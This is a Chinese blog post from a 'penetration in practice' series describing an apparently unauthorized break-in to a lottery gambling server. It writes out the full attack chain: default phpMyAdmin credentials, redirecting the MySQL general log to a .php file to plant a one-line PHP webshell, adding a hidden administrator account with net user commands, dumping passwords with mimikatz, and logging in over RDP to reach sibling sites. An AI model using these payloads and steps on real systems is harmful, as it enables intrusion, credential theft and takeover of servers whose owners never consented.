【渗透实战系列】22|-渗透系列之打击彩票站

admin 2022年3月9日21:59:27安全文章评论176 views1741字阅读5分48秒阅读模式

涉及知识点:

phpmyadmin后台写马getshllmimikatz使用,抓密码开启3389端口远程连接获取旁站

By;梭哈王


获取phpmyadmin弱口令

通过信息收集到彩票站点的ip为xxx,探测扫描发现存在phpmyadmin,通过猜测,使用默认弱口令(root/root)登入到phpmyadmin当中。

【渗透实战系列】22|-渗透系列之打击彩票站

【渗透实战系列】22|-渗透系列之打击彩票站

 

通过phpmyadmin后台sql查询写入shell到日志文件

使用phpmyadmin的sql查询功能将一句话木马写入到日志文件当中。


流程如下:


命令如下:


1、开启日志功能:set global general_log=on;


2、点击phpmyadmin变量查看日志文件名字:


【渗透实战系列】22|-渗透系列之打击彩票站


这里的日志文件是test.php。


3、执行SQL命令写入一句话到日志文件: SELECT'<?php assert($_POST["test"]);?>';


【渗透实战系列】22|-渗透系列之打击彩票站

4、执行成功返回。

【渗透实战系列】22|-渗透系列之打击彩票站


5、查看日志文件。


【渗透实战系列】22|-渗透系列之打击彩票站


6、菜刀连接添加用户并且上传mimikatz。

使用菜刀连接日志文件木马,xxx/test.php 密码:test

【渗透实战系列】22|-渗透系列之打击彩票站

 


查看发现是系统管理员sysytem权限,直接添加用户且添加到管理组即可。


命令为: C:Windowssystem32net.exe user Test [email protected]#123 /add


C:Windowssystem32net.exe  localgroup administrators Test /add


上传mimikataz到服务器当中。


【渗透实战系列】22|-渗透系列之打击彩票站



7、3389连接,读取管理员密码。

(1)、直接telnet ip 3389 测试发现可通,于是直接连接3389进去。

【渗透实战系列】22|-渗透系列之打击彩票站


(2)、或者这里在菜刀上执行以下命令查询3389开放的端口也一样。


第一步: tasklist /svc | findstr TermService 查询远程桌面服务的进程


第二步: netstat -ano | findstr ****  //查看远程桌面服务进程号对应的端口号。


(3)、执行mimikatz,读取到管理员组登录密码。


【渗透实战系列】22|-渗透系列之打击彩票站

(4)、使用获取的administrator/xxxx账户密码远程登入服务器当中。

【渗透实战系列】22|-渗透系列之打击彩票站


发现该服务器使用phpmystudy批量建立彩票站,大概有十几个站点,随意访问几个服务器上的网站域名,部分截图如下:


系统一:

【渗透实战系列】22|-渗透系列之打击彩票站


系统二:


【渗透实战系列】22|-渗透系列之打击彩票站


系统三:

【渗透实战系列】22|-渗透系列之打击彩票站

 

后台一:

【渗透实战系列】22|-渗透系列之打击彩票站


后台二:


【渗透实战系列】22|-渗透系列之打击彩票站


 

————————————————

作者:安全小哥

引用原文:https://blog.csdn.net/weixin_39997829/article/details/109186917

推荐阅读:



渗透实战系列


【渗透实战系列】21|一次理财杀猪盘渗透测试案例

【渗透实战系列】20|-渗透直播网站

【渗透实战系列】19|-杀猪盘渗透测试

【渗透实战系列】18-手动拿学校站点 得到上万人的信息(漏洞已提交)

【渗透实战系列】|17-巧用fofa对目标网站进行getshell

【渗透实战系列】|16-裸聊APP渗透测试

【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点

【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试

【渗透实战系列】|13-waf绕过拿下赌博网站

【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局

【渗透实战系列】|11 - 赌博站人人得而诛之

【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)

【渗透实战系列】|9-对境外网站开展的一次web渗透实战测试(非常详细,适合打战练手)

【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)

【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例

【渗透实战系列】|6- BC杀猪盘渗透一条龙(文末附【渗透实战系列】其他文章链接)

【渗透实战系列】|5-记一次内衣网站渗透测试

【渗透实战系列】|4-看我如何拿下BC站的服务器

【渗透实战系列】|3-一次简单的渗透

【渗透实战系列】|2-记一次后门爆破到提权实战案例

【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

【渗透实战系列】22|-渗透系列之打击彩票站

长按-识别-关注

【渗透实战系列】22|-渗透系列之打击彩票站

Hacking黑白红

一个专注信息安全技术的学习平台

【渗透实战系列】22|-渗透系列之打击彩票站

点分享

【渗透实战系列】22|-渗透系列之打击彩票站

点收藏

【渗透实战系列】22|-渗透系列之打击彩票站

点点赞

【渗透实战系列】22|-渗透系列之打击彩票站

点在看


本文始发于微信公众号(Hacking黑白红):【渗透实战系列】22|-渗透系列之打击彩票站

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月9日21:59:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【渗透实战系列】22|-渗透系列之打击彩票站 https://cn-sec.com/archives/500180.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: